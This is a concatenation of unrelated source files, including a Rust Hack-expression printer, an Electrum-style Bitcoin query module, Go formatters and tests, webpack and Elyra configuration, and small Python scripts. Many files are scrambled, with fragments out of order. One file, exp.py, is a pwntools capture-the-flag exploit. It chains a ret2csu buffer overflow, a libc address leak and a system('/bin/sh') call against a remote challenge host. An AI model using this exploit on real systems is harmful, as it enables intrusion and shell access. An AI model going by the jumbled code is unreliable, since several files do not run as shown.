print_block(ctx, w, env, block.as_ref()) } S_::If(x) => { let (cond, if_block, else_block) = &**x; write::wrap_by_(w, "if (", ") ", |w| print_expr(ctx, w, env, cond))?; print_block(ctx, w, env, if_block)?; let mut buf = Vec::new(); print_block(ctx, &mut buf, env, else_block).map_err(|e| { match write::into_error(e) { e @ Error::NotImpl(_) => e, e => Error::Fail(format!("Failed: {}", e)), } })?; if !buf.is_empty() { write_bytes!(w, " else {}", BString::from(buf))?; }; Ok(()) } S_::Block(block) => print_block_(ctx, w, env, block), S_::Noop => Ok(()), /* TODO(T29869930) */ _ => w.write_all(b"TODO Unimplemented NYI: Default value printing"), } } fn print_fparam( ctx: &Context<'_>, w: &mut dyn Write, env: &ExprEnv<'_, '_>, param: &ast::FunParam, ) -> Result<()> { if param.callconv.is_pinout() { w.write_all(b"inout ")?; } if param.is_variadic { w.write_all(b"...")?; } write::option(w, &(param.type_hint).1, |w, h| { print_hint(w, true, h)?; w.write_all(b" ") })?; w.write_all(param.name.as_bytes())?; write::option(w, &param.expr, |w, e| { w.write_all(b" = ")?; print_expr(ctx, w, env, e) }) } fn print_bop(w: &mut dyn Write, bop: &ast_defs::Bop) -> Result<()> { use ast_defs::Bop; match bop { Bop::Plus => w.write_all(b"+"), Bop::Minus => w.write_all(b"-"), Bop::Star => w.write_all(b"*"), Bop::Slash => w.write_all(b"/"), Bop::Eqeq => w.write_all(b"=="), Bop::Eqeqeq => w.write_all(b"==="), Bop::Starstar => w.write_all(b"**"), Bop::Eq(None) => w.write_all(b"="), Bop::Eq(Some(bop)) => { w.write_all(b"=")?; print_bop(w, bop) } Bop::Ampamp => w.write_all(b"&&"), Bop::Barbar => w.write_all(b"||"), Bop::Lt => w.write_all(b"<"), Bop::Lte => w.write_all(b"<="), Bop::Cmp => w.write_all(b"<=>"), Bop::Gt => w.write_all(b">"), Bop::Gte => w.write_all(b">="), Bop::Dot => w.write_all(b"."), Bop::Amp => w.write_all(b"&"), Bop::Bar => w.write_all(b"|"), Bop::Ltlt => w.write_all(b"<<"), Bop::Gtgt => w.write_all(b">>"), Bop::Percent => w.write_all(b"%"), Bop::Xor => w.write_all(b"^"), Bop::Diff => w.write_all(b"!="), Bop::Diff2 => w.write_all(b"!=="), Bop::QuestionQuestion => w.write_all(b"??"), } } fn print_hint(w: &mut dyn Write, ns: bool, hint: &ast::Hint) -> Result<()> { let alloc = bumpalo::Bump::new(); let h = emit_type_hint::fmt_hint(&alloc, &[], false, hint).map_err(|e| match e.kind() { ErrorKind::Unrecoverable(s) => Error::fail(s), _ => Error::fail("Error printing hint"), })?; if ns { w.write_all(escaper::escape(h).as_bytes()) } else { 
w.write_all(escaper::escape(strip_ns(&h)).as_bytes()) } } fn print_import_flavor(w: &mut dyn Write, flavor: &ast::ImportFlavor) -> Result<()> { use ast::ImportFlavor as F; w.write_all(match flavor { F::Include => b"include", F::Require => b"require", F::IncludeOnce => b"include_once", F::RequireOnce => b"require_once", }) } /// Convert an `Expr` to a `String` of the equivalent source code. /// /// This is a debugging tool abusing a printer written for bytecode /// emission. It does not support all Hack expressions, and panics /// on unsupported syntax. /// /// If you have an `Expr` with positions, you are much better off /// getting the source code at those positions rather than using this. pub fn expr_to_string_lossy(mut ctx: Context<'_>, expr: &ast::Expr) -> String { ctx.dump_lambdas = true; let env = ExprEnv { codegen_env: None }; let mut escaped_src = Vec::new(); print_expr(&ctx, &mut escaped_src, &env, expr).expect("Printing failed"); let bs = escaper::unescape_double(unsafe { std::str::from_utf8_unchecked(&escaped_src) }) .expect("Unescaping failed"); let s = String::from_utf8_lossy(&bs); s.to_string() } pub fn external_print_expr( ctx: &Context<'_>, w: &mut dyn std::io::Write, env: &ExprEnv<'_, '_>, expr: &ast::Expr, ) -> std::result::Result<(), Error> { print_expr(ctx, w, env, expr).map_err(write::into_error)?; w.flush().map_err(write::into_error)?; Ok(()) }
print_xml
DiscardPower.js
const GameAction = require('./GameAction'); class DiscardPower extends GameAction { constructor() { super('discardPower'); } canChangeGameState({ card }) { return ['active plot', 'faction', 'play area'].includes(card.location) && card.power > 0; } createEvent({ card, amount = 1 }) { let finalAmount = Math.min(card.power, amount); return this.event('onCardPowerDiscarded', { card, power: finalAmount }, event => { event.card.power -= event.power; event.card.game.checkWinCondition(event.card.controller); }); }
} module.exports = new DiscardPower();
string.go
package scanner import "errors" func newStringScanner(ctx *buildingContext, position int) Scanner
{ ctx.fullRe = append(ctx.fullRe, "(.*)"...) return FuncScanner(func(input []byte, kv []interface{}) error { val, _ := kv[position].(*string) if val == nil { return errors.New("variable is not string pointer") } *val = string(input) return nil }) }
ep-vec.rs
// Copyright 2017 The Rust Project Developers. See the COPYRIGHT // file at the top-level directory of this distribution and at // http://rust-lang.org/COPYRIGHT. // // Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or // http://www.apache.org/licenses/LICENSE-2.0> or the MIT license // <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your // option. This file may not be copied, modified, or distributed // except according to those terms. #![crate_type = "rlib"] pub fn new(arg1: f32, arg2: ())
{}
format_test.go
// // Copyright (c) 2018 Cavium // // SPDX-License-Identifier: Apache-2.0 // package distro import ( "encoding/json"
"github.com/edgexfoundry/edgex-go/core/domain/models" ) const ( devID1 = "id1" ) func TestJson(t *testing.T) { eventIn := models.Event{ Device: devID1, } jf := jsonFormater{} out := jf.Format(&eventIn) if out == nil { t.Fatal("out should not be nil") } var eventOut models.Event if err := json.Unmarshal(out, &eventOut); err != nil { t.Fatalf("Error unmarshalling event: %v", err) } if !reflect.DeepEqual(eventIn, eventOut) { t.Fatalf("Objects should be equals: %v %v", eventIn, eventOut) } } func TestXml(t *testing.T) { eventIn := models.Event{ Device: devID1, } xf := xmlFormater{} out := xf.Format(&eventIn) if out == nil { t.Fatal("out should not be nil") } var eventOut models.Event if err := xml.Unmarshal(out, &eventOut); err != nil { t.Fatalf("Error unmarshalling event: %v", err) } if !reflect.DeepEqual(eventIn, eventOut) { t.Fatalf("Objects should be equals: %v %v", eventIn, eventOut) } }
"encoding/xml" "reflect" "testing"
json.py
class
: craftplan = 'json/craftplan.json' category_to_icon_en = 'json/en/category_to_icon_en.json' words_en = 'json/en/words_en.json' items_en = 'json/en/items_en.json' material_to_icon_en = 'json/en/material_to_icon_en.json' plans_en = 'json/en/plans_en.json' materials_en = 'json/en/materials_en.json' items_fr = 'json/fr/items_fr.json' materials_fr = 'json/fr/materials_fr.json' words_fr = 'json/fr/words_fr.json' plans_fr = 'json/fr/plans_fr.json' category_to_icon_fr = 'json/fr/category_to_icon_fr.json' material_to_icon_fr = 'json/fr/material_to_icon_fr.json' @classmethod def get(cls, string): return cls.__getattribute__(cls, string)
JsonRes
exp.py
from pwn import * from LibcSearcher import LibcSearcher import sys io = -1 ############################ #******** edit the target file name ********** ############################ file_name = 'level3_x64' port = 27974 ########### edit these flags ########### DEBUG = 1 LOG_PRINT = 1 TMUX = 0 def LOG_ADDR_SUCCESS(name:str, addr:int): ''' Print an address
informational message ''' if LOG_PRINT: log.success(info) def Get_Str_Addr(target_addr:str): """ Get the address of a string """ global io return io.search(target_addr.encode()).__next__() if len(sys.argv) > 1 and sys.argv[1].isdigit(): io = remote('node3.buuoj.cn', int(sys.argv[1])) DEBUG = False def STOP(*args): pass elif DEBUG: # local exploitation io = process('./{}'.format(file_name)) def STOP(idx:str = 0): input('stop{} ===> {}'.format(idx, proc.pidof(io))) if TMUX: context.terminal = ['tmux', 'splitw', '-h'] gdb.attach(io, gdbscript='b *0x80485FC\nc\n') else: # remote exploitation io = remote('node3.buuoj.cn', port) DEBUG = False def STOP(*args): pass io_elf = ELF('./{}'.format(file_name)) log.success("libc used ===> {}".format(io_elf.libc)) ########################## exploit code below ####################### ########################## exploit code below ####################### context.update(os='linux', arch='amd64', log_level='debug', endian='little') ''' ret2csu ''' csu_end = 0x4006AA csu_begin = 0x400690 io.recvuntil("Input:\n") payload = 0x88 * b'a' payload += p64(csu_end) + p64(0) + p64(1) + p64(io_elf.got['write']) payload += p64(0x10) + p64(io_elf.got['read']) + p64(1) payload += p64(csu_begin) payload += 0x38 * b'a' payload += p64(io_elf.sym['vulnerable_function']) io.send(payload) msg = io.recv() print(msg) read_addr = u64(msg[:6].ljust(8, b'\x00')) LOG_ADDR_SUCCESS('read_addr', read_addr) libc = LibcSearcher('read', read_addr) libc_base = read_addr - libc.dump('read') system_addr = libc_base + libc.dump('system') str_bin_sh = libc_base + libc.dump('str_bin_sh') LOG_ADDR_SUCCESS('libc_base', libc_base) LOG_ADDR_SUCCESS('system_addr', system_addr) LOG_ADDR_SUCCESS('str_bin_sh', str_bin_sh) payload = b'a' * 0x88 payload += p64(0x4006b3) + p64(str_bin_sh) payload += p64(system_addr) STOP() io.send(payload) io.interactive()
name: variable name, str addr: address, int ''' global LOG_PRINT if LOG_PRINT: log.success('{} ===> {}'.format(name, hex(addr))) def LOG_SUCCESS(info): ''' Print an
step09 buffer.py
class Buffer: def __init__(self):
def add(self, *a): for value in a: self.lst.append(value) while len(self.lst) >= 5: s = 0 for i in range(5): s += self.lst.pop(0) print(s) def get_current_part(self): return self.lst
self.lst = list()
query.rs
use bitcoin::blockdata::transaction::Transaction; use bitcoin::consensus::encode::deserialize; use bitcoin::hash_types::{BlockHash, TxMerkleNode, Txid}; use bitcoin::hashes::sha256d::Hash as Sha256dHash; use bitcoin_hashes::hex::ToHex; use bitcoin_hashes::Hash; use crypto::digest::Digest; use crypto::sha2::Sha256; use serde_json::Value; use std::collections::HashMap; use std::sync::{Arc, RwLock}; use crate::app::App; use crate::cache::TransactionCache; use crate::errors::*; use crate::index::{compute_script_hash, TxInRow, TxOutRow, TxRow}; use crate::mempool::Tracker; use crate::metrics::{HistogramOpts, HistogramVec, Metrics}; use crate::store::{ReadStore, Row}; use crate::util::{FullHash, HashPrefix, HeaderEntry}; pub struct FundingOutput { pub txn_id: Txid, pub height: u32, pub output_index: usize, pub value: u64, } type OutPoint = (Txid, usize); // (txid, output_index) struct SpendingInput { txn_id: Txid, height: u32, funding_output: OutPoint, value: u64, } pub struct Status { confirmed: (Vec<FundingOutput>, Vec<SpendingInput>), mempool: (Vec<FundingOutput>, Vec<SpendingInput>), txn_fees: HashMap<Txid, u64>, } fn calc_balance((funding, spending): &(Vec<FundingOutput>, Vec<SpendingInput>)) -> i64 { let funded: u64 = funding.iter().map(|output| output.value).sum(); let spent: u64 = spending.iter().map(|input| input.value).sum(); funded as i64 - spent as i64 } pub struct HistoryItem { height: i32, tx_hash: Txid, fee: Option<u64>, // need to be set only for unconfirmed transactions (i.e. height <= 0) } impl HistoryItem { pub fn to_json(&self) -> Value { let mut result = json!({ "height": self.height, "tx_hash": self.tx_hash.to_hex()}); self.fee.map(|f| { result .as_object_mut() .unwrap() .insert("fee".to_string(), json!(f)) }); result } } impl Status { fn funding(&self) -> impl Iterator<Item = &FundingOutput> { self.confirmed.0.iter().chain(self.mempool.0.iter()) } fn spending(&self) -> impl Iterator<Item = &SpendingInput> { self.confirmed.1.iter().chain(self.mempool.1.iter()) } pub fn confirmed_balance(&self) -> i64 { calc_balance(&self.confirmed) } pub fn mempool_balance(&self) -> i64 { calc_balance(&self.mempool) } pub fn history(&self) -> Vec<HistoryItem> { let mut txns_map = HashMap::<Txid, i32>::new(); for f in self.funding() { txns_map.insert(f.txn_id, f.height as i32); } for s in self.spending() { txns_map.insert(s.txn_id, s.height as i32); } let mut items: Vec<HistoryItem> = txns_map .into_iter() .map(|item| HistoryItem { height: item.1, tx_hash: item.0, fee: self.txn_fees.get(&item.0).cloned(), }) .collect(); items.sort_unstable_by_key(|item| item.height); items } pub fn unspent(&self) -> Vec<&FundingOutput> { let mut outputs_map = HashMap::<OutPoint, &FundingOutput>::new(); for f in self.funding() { outputs_map.insert((f.txn_id, f.output_index), f); } for s in self.spending() { if outputs_map.remove(&s.funding_output).is_none() { warn!("failed to remove {:?}", s.funding_output); } } let mut outputs = outputs_map .into_iter() .map(|item| item.1) // a reference to unspent output .collect::<Vec<&FundingOutput>>(); outputs.sort_unstable_by_key(|out| out.height); outputs } pub fn hash(&self) -> Option<FullHash> { let txns = self.history(); if txns.is_empty() { None } else { let mut hash = FullHash::default(); let mut sha2 = Sha256::new(); for item in txns { let part = format!("{}:{}:", item.tx_hash.to_hex(), item.height); sha2.input(part.as_bytes()); } sha2.result(&mut hash); Some(hash) } } } struct TxnHeight { txn: Transaction, height: u32, } fn merklize<T: Hash>(left: T, right: T) 
-> T { let data = [&left[..], &right[..]].concat(); <T as Hash>::hash(&data) } fn create_merkle_branch_and_root<T: Hash>(mut hashes: Vec<T>, mut index: usize) -> (Vec<T>, T) { let mut merkle = vec![]; while hashes.len() > 1 { if hashes.len() % 2 != 0 { let last = *hashes.last().unwrap(); hashes.push(last); } index = if index % 2 == 0 { index + 1 } else { index - 1 }; merkle.push(hashes[index]); index /= 2; hashes = hashes .chunks(2) .map(|pair| merklize(pair[0], pair[1])) .collect() } (merkle, hashes[0]) } // TODO: the functions below can be part of ReadStore. fn txrow_by_txid(store: &dyn ReadStore, txid: &Txid) -> Option<TxRow> { let key = TxRow::filter_full(&txid); let value = store.get(&key)?; Some(TxRow::from_row(&Row { key, value })) } fn txrows_by_prefix(store: &dyn ReadStore, txid_prefix: HashPrefix) -> Vec<TxRow> { store .scan(&TxRow::filter_prefix(txid_prefix)) .iter() .map(|row| TxRow::from_row(row)) .collect() } fn txids_by_script_hash(store: &dyn ReadStore, script_hash: &[u8]) -> Vec<HashPrefix> { store .scan(&TxOutRow::filter(script_hash)) .iter() .map(|row| TxOutRow::from_row(row).txid_prefix) .collect() } fn txids_by_funding_output( store: &dyn ReadStore, txn_id: &Txid, output_index: usize, ) -> Vec<HashPrefix> { store .scan(&TxInRow::filter(&txn_id, output_index)) .iter() .map(|row| TxInRow::from_row(row).txid_prefix) .collect() } pub struct Query { app: Arc<App>, tracker: RwLock<Tracker>, tx_cache: TransactionCache, txid_limit: usize, duration: HistogramVec, } impl Query { pub fn new( app: Arc<App>, metrics: &Metrics, tx_cache: TransactionCache, txid_limit: usize, ) -> Arc<Query> { Arc::new(Query { app, tracker: RwLock::new(Tracker::new(metrics)), tx_cache, txid_limit, duration: metrics.histogram_vec( HistogramOpts::new( "electrs_query_duration", "Time to update mempool (in seconds)", ), &["type"], ), }) } fn load_txns_by_prefix( &self, store: &dyn ReadStore, prefixes: Vec<HashPrefix>, ) -> Result<Vec<TxnHeight>> { let mut txns = vec![]; for txid_prefix in prefixes { for tx_row in txrows_by_prefix(store, txid_prefix) { let txid: Txid = deserialize(&tx_row.key.txid).unwrap(); let txn = self.load_txn(&txid, Some(tx_row.height))?; txns.push(TxnHeight { txn, height: tx_row.height, }) } } Ok(txns) } fn find_spending_input( &self, store: &dyn ReadStore, funding: &FundingOutput, ) -> Result<Option<SpendingInput>> { let spending_txns: Vec<TxnHeight> = self.load_txns_by_prefix( store, txids_by_funding_output(store, &funding.txn_id, funding.output_index), )?; let mut spending_inputs = vec![]; for t in &spending_txns { for input in t.txn.input.iter() { if input.previous_output.txid == funding.txn_id && input.previous_output.vout == funding.output_index as u32 { spending_inputs.push(SpendingInput { txn_id: t.txn.txid(), height: t.height, funding_output: (funding.txn_id, funding.output_index), value: funding.value, }) } } } assert!(spending_inputs.len() <= 1); Ok(if spending_inputs.len() == 1 { Some(spending_inputs.remove(0)) } else { None }) } fn find_funding_outputs(&self, t: &TxnHeight, script_hash: &[u8]) -> Vec<FundingOutput> { let mut result = vec![]; let txn_id = t.txn.txid(); for (index, output) in t.txn.output.iter().enumerate() { if compute_script_hash(&output.script_pubkey[..]) == script_hash { result.push(FundingOutput { txn_id, height: t.height, output_index: index, value: output.value, }) } } result } fn confirmed_status( &self, script_hash: &[u8], ) -> Result<(Vec<FundingOutput>, Vec<SpendingInput>)> { let mut funding = vec![]; let mut spending = vec![]; let read_store = 
self.app.read_store(); let txid_prefixes = txids_by_script_hash(read_store, script_hash); // if the limit is enabled if self.txid_limit > 0 && txid_prefixes.len() > self.txid_limit { bail!( "{}+ transactions found, query may take a long time", txid_prefixes.len() ); } for t in self.load_txns_by_prefix(read_store, txid_prefixes)? { funding.extend(self.find_funding_outputs(&t, script_hash)); } for funding_output in &funding { if let Some(spent) = self.find_spending_input(read_store, &funding_output)?
} Ok((funding, spending)) } fn mempool_status( &self, script_hash: &[u8], confirmed_funding: &[FundingOutput], tracker: &Tracker, ) -> Result<(Vec<FundingOutput>, Vec<SpendingInput>)> { let mut funding = vec![]; let mut spending = vec![]; let txid_prefixes = txids_by_script_hash(tracker.index(), script_hash); for t in self.load_txns_by_prefix(tracker.index(), txid_prefixes)? { funding.extend(self.find_funding_outputs(&t, script_hash)); } // // TODO: dedup outputs (somehow) both confirmed and in mempool (e.g. reorg?) for funding_output in funding.iter().chain(confirmed_funding.iter()) { if let Some(spent) = self.find_spending_input(tracker.index(), &funding_output)? { spending.push(spent); } } Ok((funding, spending)) } pub fn status(&self, script_hash: &[u8]) -> Result<Status> { let timer = self .duration .with_label_values(&["confirmed_status"]) .start_timer(); let confirmed = self .confirmed_status(script_hash) .chain_err(|| "failed to get confirmed status")?; timer.observe_duration(); let tracker = self.tracker.read().unwrap(); let timer = self .duration .with_label_values(&["mempool_status"]) .start_timer(); let mempool = self .mempool_status(script_hash, &confirmed.0, &tracker) .chain_err(|| "failed to get mempool status")?; timer.observe_duration(); let mut txn_fees = HashMap::new(); let funding_txn_ids = mempool.0.iter().map(|funding| funding.txn_id); let spending_txn_ids = mempool.1.iter().map(|spending| spending.txn_id); for mempool_txid in funding_txn_ids.chain(spending_txn_ids) { tracker .get_fee(&mempool_txid) .map(|fee| txn_fees.insert(mempool_txid, fee)); } Ok(Status { confirmed, mempool, txn_fees, }) } fn lookup_confirmed_blockhash( &self, tx_hash: &Txid, block_height: Option<u32>, ) -> Result<Option<BlockHash>> { let blockhash = if self.tracker.read().unwrap().has_txn(&tx_hash) { None // found in mempool (as unconfirmed transaction) } else { // Lookup in confirmed transactions' index let height = match block_height { Some(height) => height, None => { txrow_by_txid(self.app.read_store(), &tx_hash) .chain_err(|| format!("not indexed tx {}", tx_hash))? 
.height } }; let header = self .app .index() .get_header(height as usize) .chain_err(|| format!("missing header at height {}", height))?; Some(*header.hash()) }; Ok(blockhash) } // Internal API for transaction retrieval fn load_txn(&self, txid: &Txid, block_height: Option<u32>) -> Result<Transaction> { let _timer = self.duration.with_label_values(&["load_txn"]).start_timer(); self.tx_cache.get_or_else(&txid, || { let blockhash = self.lookup_confirmed_blockhash(txid, block_height)?; let value: Value = self .app .daemon() .gettransaction_raw(txid, blockhash, /*verbose*/ false)?; let value_hex: &str = value.as_str().chain_err(|| "non-string tx")?; hex::decode(&value_hex).chain_err(|| "non-hex tx") }) } // Public API for transaction retrieval (for Electrum RPC) pub fn get_transaction(&self, tx_hash: &Txid, verbose: bool) -> Result<Value> { let _timer = self .duration .with_label_values(&["get_transaction"]) .start_timer(); let blockhash = self.lookup_confirmed_blockhash(tx_hash, /*block_height*/ None)?; self.app .daemon() .gettransaction_raw(tx_hash, blockhash, verbose) } pub fn get_headers(&self, heights: &[usize]) -> Vec<HeaderEntry> { let _timer = self .duration .with_label_values(&["get_headers"]) .start_timer(); let index = self.app.index(); heights .iter() .filter_map(|height| index.get_header(*height)) .collect() } pub fn get_best_header(&self) -> Result<HeaderEntry> { let last_header = self.app.index().best_header(); Ok(last_header.chain_err(|| "no headers indexed")?.clone()) } pub fn get_merkle_proof( &self, tx_hash: &Txid, height: usize, ) -> Result<(Vec<TxMerkleNode>, usize)> { let header_entry = self .app .index() .get_header(height) .chain_err(|| format!("missing block #{}", height))?; let txids = self.app.daemon().getblocktxids(&header_entry.hash())?; let pos = txids .iter() .position(|txid| txid == tx_hash) .chain_err(|| format!("missing txid {}", tx_hash))?; let tx_nodes: Vec<TxMerkleNode> = txids .into_iter() .map(|txid| TxMerkleNode::from_inner(txid.into_inner())) .collect(); let (branch, _root) = create_merkle_branch_and_root(tx_nodes, pos); Ok((branch, pos)) } pub fn get_header_merkle_proof( &self, height: usize, cp_height: usize, ) -> Result<(Vec<Sha256dHash>, Sha256dHash)> { if cp_height < height { bail!("cp_height #{} < height #{}", cp_height, height); } let best_height = self.get_best_header()?.height(); if best_height < cp_height { bail!( "cp_height #{} above best block height #{}", cp_height, best_height ); } let heights: Vec<usize> = (0..=cp_height).collect(); let header_hashes: Vec<BlockHash> = self .get_headers(&heights) .into_iter() .map(|h| *h.hash()) .collect(); let merkle_nodes: Vec<Sha256dHash> = header_hashes .iter() .map(|block_hash| Sha256dHash::from_inner(block_hash.into_inner())) .collect(); assert_eq!(header_hashes.len(), heights.len()); Ok(create_merkle_branch_and_root(merkle_nodes, height)) } pub fn get_id_from_pos( &self, height: usize, tx_pos: usize, want_merkle: bool, ) -> Result<(Txid, Vec<TxMerkleNode>)> { let header_entry = self .app .index() .get_header(height) .chain_err(|| format!("missing block #{}", height))?; let txids = self.app.daemon().getblocktxids(header_entry.hash())?; let txid = *txids .get(tx_pos) .chain_err(|| format!("No tx in position #{} in block #{}", tx_pos, height))?; let tx_nodes = txids .into_iter() .map(|txid| TxMerkleNode::from_inner(txid.into_inner())) .collect(); let branch = if want_merkle { create_merkle_branch_and_root(tx_nodes, tx_pos).0 } else { vec![] }; Ok((txid, branch)) } pub fn broadcast(&self, txn: 
&Transaction) -> Result<Txid> { self.app.daemon().broadcast(txn) } pub fn update_mempool(&self) -> Result<()> { let _timer = self .duration .with_label_values(&["update_mempool"]) .start_timer(); self.tracker.write().unwrap().update(self.app.daemon()) } /// Returns [vsize, fee_rate] pairs (measured in vbytes and satoshis). pub fn get_fee_histogram(&self) -> Vec<(f32, u32)> { self.tracker.read().unwrap().fee_histogram().clone() } // Fee rate [BTC/kB] to be confirmed in `blocks` from now. pub fn estimate_fee(&self, blocks: usize) -> f64 { let mut total_vsize = 0u32; let mut last_fee_rate = 0.0; let blocks_in_vbytes = (blocks * 1_000_000) as u32; // assume ~1MB blocks for (fee_rate, vsize) in self.tracker.read().unwrap().fee_histogram() { last_fee_rate = *fee_rate; total_vsize += vsize; if total_vsize >= blocks_in_vbytes { break; // under-estimate the fee rate a bit } } (last_fee_rate as f64) * 1e-5 // [BTC/kB] = 10^5 [sat/B] } pub fn get_banner(&self) -> Result<String> { self.app.get_banner() } pub fn get_relayfee(&self) -> Result<f64> { self.app.daemon().get_relayfee() } }
{ spending.push(spent); }
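The estimate_fee routine above walks the mempool fee histogram from the highest rate down, accumulating vsize until roughly `blocks` worth of ~1 MB blocks is covered, then converts the last sat/vB rate to BTC/kB. A rough Go transcription of that loop, offered only to illustrate the arithmetic; the histogram values in main are made up for the example.

package main

import "fmt"

// feeBucket mirrors the (fee_rate, vsize) pairs of the tracker's histogram:
// fee rate in sat/vB and total vsize of mempool transactions paying that rate.
type feeBucket struct {
	feeRate float64
	vsize   uint32
}

// estimateFee returns a fee rate in BTC/kB expected to confirm within `blocks`,
// assuming ~1 MB of vsize per block, as in the Rust code above.
// The buckets are assumed to be sorted from highest fee rate down, as the original loop implies.
func estimateFee(histogram []feeBucket, blocks int) float64 {
	var totalVsize uint32
	lastRate := 0.0
	target := uint32(blocks * 1_000_000)
	for _, b := range histogram {
		lastRate = b.feeRate
		totalVsize += b.vsize
		if totalVsize >= target {
			break // under-estimate the fee rate a bit, like the original
		}
	}
	return lastRate * 1e-5 // [BTC/kB] = 10^5 [sat/B]
}

func main() {
	hist := []feeBucket{{50, 400_000}, {20, 900_000}, {5, 2_000_000}} // made-up data
	fmt.Printf("%.8f BTC/kB\n", estimateFee(hist, 2))
}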
format.go
package tanka import ( "fmt" "os" "github.com/gobwas/glob" "github.com/google/go-jsonnet/formatter" "github.com/grafana/tanka/pkg/jsonnet" "github.com/pkg/errors" ) // FormatOpts modify the behaviour of Format type FormatOpts struct { // Excludes are a list of globs to exclude files while searching for Jsonnet // files Excludes []glob.Glob // OutFn receives the formatted file and it's name. If left nil, the file // will be formatted in place. OutFn OutFn // PrintNames causes all filenames to be printed PrintNames bool } // OutFn is a function that receives the formatted file for further action, // like persisting to disc type OutFn func(name, content string) error // FormatFiles takes a list of files and directories, processes them and returns // which files were formatted and perhaps an error. func FormatFiles(fds []string, opts *FormatOpts) ([]string, error) { var paths []string for _, f := range fds { fs, err := jsonnet.FindFiles(f, opts.Excludes) if err != nil { return nil, errors.Wrap(err, "finding Jsonnet files") } paths = append(paths, fs...) } // if nothing defined, default to save inplace outFn := opts.OutFn if outFn == nil { outFn = func(name, content string) error { return os.WriteFile(name, []byte(content), 0644) } } // print each file? printFn := func(...interface{}) { return } if opts.PrintNames { printFn = func(i ...interface{}) { fmt.Println(i...) } } var changed []string for _, p := range paths { content, err := os.ReadFile(p) if err != nil { return nil, err } formatted, err := Format(p, string(content))
if err != nil { return nil, err } if string(content) != formatted { printFn("fmt", p) changed = append(changed, p) } else { printFn("ok ", p) } if err := outFn(p, formatted); err != nil { return nil, err } } return changed, nil } // Format takes a file's name and contents and returns them properly // formatted. The file does not have to exist on disk. func Format(filename string, content string) (string, error) { return formatter.Format(filename, content, formatter.DefaultOptions()) }
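Because Format needs only a name and the file's contents, it can be called on strings that never touch disk. A minimal Go sketch of such a call; the github.com/grafana/tanka/pkg/tanka import path and the inline Jsonnet snippet are assumptions for illustration, not taken from the file above.

package main

import (
	"fmt"
	"log"

	"github.com/grafana/tanka/pkg/tanka" // assumed import path for the tanka package shown above
)

func main() {
	// Hypothetical, unformatted Jsonnet; the named file never has to exist on disk.
	src := "{foo: 'bar', baz: [1,2,3]}"

	formatted, err := tanka.Format("example.jsonnet", src)
	if err != nil {
		log.Fatalf("formatting failed: %v", err)
	}
	fmt.Print(formatted)
}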
6-num.py
import sys
sys.stdout = open("6-num.txt", "w") data = "1234567890" for a in data: for b in data:
print(a+b+c+d+e+f) sys.stdout.close()
for c in data: for d in data: for e in data: for f in data:
webpack.config.js
const path = require('path'); const HtmlWebpackPlugin = require(`html-webpack-plugin`); const CircularDependencyPlugin = require('circular-dependency-plugin'); module.exports = { devtool: 'source-map',
context: path.resolve(__dirname, 'src'), output: { path: path.resolve(__dirname, '../docs'), filename: 'bundle.js' }, module: { loaders: [{ test: /\.js$/, loader: 'babel-loader', exclude: /node_modules/ }, { test: /\.scss$/, loaders: ['style-loader/useable', 'css-loader', 'postcss-loader', 'sass-loader'], exclude: /node_modules/ }, { test: /\.css$/, loaders: ['style-loader/useable', 'css-loader'], exclude: /node_modules/ }, { test: /\.(woff|woff2|ttf|eot|ico|png|gif|jpg|jpeg)(\?|$)/, loader: 'file-loader', }] }, plugins: [ new HtmlWebpackPlugin({ template: 'index.html', favicon: 'favicon.ico', inject: 'body', cache: true, showErrors: true }), new CircularDependencyPlugin({ exclude: /node_modules/, failOnError: true, }), ], devServer: { contentBase: 'src-docs/build', host: 'localhost', port: 8030, disableHostCheck: true } };
entry: { guide: './index.js' },
elyra_app.py
# # Copyright 2018-2021 Elyra Authors # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import os from jupyter_server.extension.application import ExtensionApp from jupyter_server.extension.application import ExtensionAppJinjaMixin from elyra._version import __version__ from elyra.api.handlers import YamlSpecHandler from elyra.contents.handlers import ContentHandler from elyra.metadata.handlers import MetadataHandler from elyra.metadata.handlers import MetadataResourceHandler from elyra.metadata.handlers import SchemaHandler from elyra.metadata.handlers import SchemaResourceHandler from elyra.metadata.handlers import SchemaspaceHandler from elyra.metadata.handlers import SchemaspaceResourceHandler from elyra.metadata.manager import MetadataManager from elyra.metadata.schema import SchemaManager from elyra.metadata.storage import FileMetadataCache from elyra.pipeline.catalog_connector import ComponentCatalogConnector from elyra.pipeline.component_registry import ComponentRegistry from elyra.pipeline.handlers import PipelineComponentHandler from elyra.pipeline.handlers import PipelineComponentPropertiesHandler from elyra.pipeline.handlers import PipelineExportHandler from elyra.pipeline.handlers import PipelineSchedulerHandler from elyra.pipeline.handlers import PipelineValidationHandler from elyra.pipeline.processor import PipelineProcessor from elyra.pipeline.processor import PipelineProcessorManager from elyra.pipeline.processor import PipelineProcessorRegistry from elyra.pipeline.validation import PipelineValidationManager DEFAULT_STATIC_FILES_PATH = os.path.join(os.path.dirname(__file__), "static") DEFAULT_TEMPLATE_FILES_PATH = os.path.join(os.path.dirname(__file__), "templates") class ElyraApp(ExtensionAppJinjaMixin, ExtensionApp): # The name of the extension. name = "elyra" version = __version__ description = "Elyra Server" extension_url = '/lab' load_other_extensions = True classes = [FileMetadataCache, MetadataManager, PipelineProcessor, ComponentCatalogConnector, ComponentRegistry] # Local path to static files directory. # static_paths = [ # DEFAULT_STATIC_FILES_PATH # ] # Local path to templates directory. # template_paths = [ # DEFAULT_TEMPLATE_FILES_PATH # ] # Define ElyraApp configurables here.. 
